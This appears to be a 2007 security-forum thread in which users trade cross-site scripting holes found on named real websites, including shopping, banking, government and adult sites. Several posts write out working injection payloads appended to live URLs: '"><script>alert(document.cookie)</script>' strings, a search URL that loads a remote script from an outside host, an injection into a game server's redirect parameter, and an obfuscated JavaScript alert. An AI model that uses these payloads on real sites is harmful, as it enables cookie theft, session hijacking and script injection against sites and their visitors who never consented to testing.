Yes, like I said. I didn't found anything.
But people never cease to amaze me:)

Actually if you look into HTML source [www.thelookandsoundofperfect.com] there is

var MMredirectURL = window.location;

and

+ '<param name="movie" value="flashplayer_install.swf?MMredirectURL='+MMredirectURL+'&MMplayerType=ActiveX&MMdoctitle='+MMdoctitle+'" />'
document.write(productInstallOETags); // embed the Flash Product Installation SWF

But this code is executed only if Flash is not installed.

I didn't look at thelookandsoundofperfect.com until now. Here you have it:

[www.thelookandsoundofperfect.com]

Here is how you can load any Flash movie into their content pane (maybe I should call this "Flash Injection" :)

[www.thelookandsoundofperfect.com]

Now you only need to find a redirect on their site to inject a video from a third-party site. And here are some scripts you might want to play around with (don't seem vulnerable however):

[www.thelookandsoundofperfect.com]
[www.thelookandsoundofperfect.com]

Also, XSS in a page they are linking to:

[www.soundandvisionmag.com]



Edited 2 time(s). Last edit at 05/02/2007 11:36AM by trev.

Thanks trev,
Nice findings :)

In IE: [horo.mail.ru]
In Firefox: [horo.mail.ru]

[www.gnc.com]



Edited 1 time(s). Last edit at 05/02/2007 08:59PM by fyoung.

[www.marketingcrossing.com]

In response to this: [sla.ckers.org] =oD

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

[www.iqfieber.de]
[www.lebenstest.de]

same with nested injection (more than 10 alerts!)

[www.lebenstest.de]

contains multiple iframes, someone out there to improve to show them all? Don't hesitate to start million of tests with foobar-data, it's a junk site anyway ;-)

a XSS on miniclip.com

[www.miniclip.com];

not necesarely gun run but that was a game that I was looking for before I discovered it...

[www.lrb.co.uk]"><script>alert(document.cookie)</script>
[lc.sduhsd.net];
[www.redir.cz];
[keetweej.vanheusden.com];
[www.nhlbi.nih.gov];
[www.ntis.gov]"><script>alert(document.cookie)</script>
[www.statenews.com]

-------------------------------
[fr3dc3rv.blogspot.com]



Edited 1 time(s). Last edit at 05/08/2007 02:38PM by FR3DC3RV.

ouch!

[plugins-customers.nessus.org]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

ouch!²

[www.zonealarm.com]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

[groups.yahoo.com]



Edited 2 time(s). Last edit at 05/10/2007 01:14AM by beford.

[www.java4less.com]

demo pages are bad =o(

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

[www.search.com]

[my.cnet.com]

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 05/11/2007 10:00AM by tx.

Counter-Strike AmxMod - WebMod XSS

'http://games7.evolva.ro:27015/auth.w?redir="><script>alert(1337)</script>



Edited 1 time(s). Last edit at 05/11/2007 05:51PM by nemessis.

[mynasa.nasa.gov];

then go to [mynasa.nasa.gov] to fire

[www.volvoautobank.de]
www.porschebank.at [www.whiteacid.org]
[www.porschebank.com]
[www.nissanbank.de]
[dcc1.daimlerchrysler-bank-aktionen.de]
[www.gmac-fintoolscompact.com]



Edited 1 time(s). Last edit at 05/17/2007 01:53PM by kirke.

For my friends at the AACS: [www.hddvd.org]

.[visasearch.visa.com]



Edited 1 time(s). Last edit at 05/13/2007 05:26PM by nemessis.

:)https://shopping.ccbill.com/search.cgi?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&adult=0&generalSearch=%A0%A0%A0SEARCH%A0%A0%A0

More nexopia.
Don't need to be logged in for these ones.

[plus.www.nexopia.com]

Link fixed, but the hole is too.

- Kyran



Edited 1 time(s). Last edit at 05/15/2007 08:54PM by Kyran.

I'd just like to point out to the people finding all these XSS flaws that a new version of the XSS assistant is out, click here for more info: [sla.ckers.org]

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Imlive.com :)

[imlive.com]"><script>alert('Nemessis')</script>&cat=1&roomid=10

enjoy.be

[cams.enjoy.be]"><script>alert(1337)</script>

Flirt4free.com

[www.flirt4free.com]"><script>alert('Nemessis-www.rstzone.net')</script>&PHPSESSID=b9d7fa98aaeb41f6c5c2f04f158fbdce

Seventeenlive.com

[www.seventeenlive.com]

[mail.k.ro]

[www.epassporte.com]

i know i shouldn't go pokin' around at the good publishers site... but the irony factor was just too much... [www.syngress.com]

www.undernet.org

[www.undernet.org]"><script>alert(1337)</script>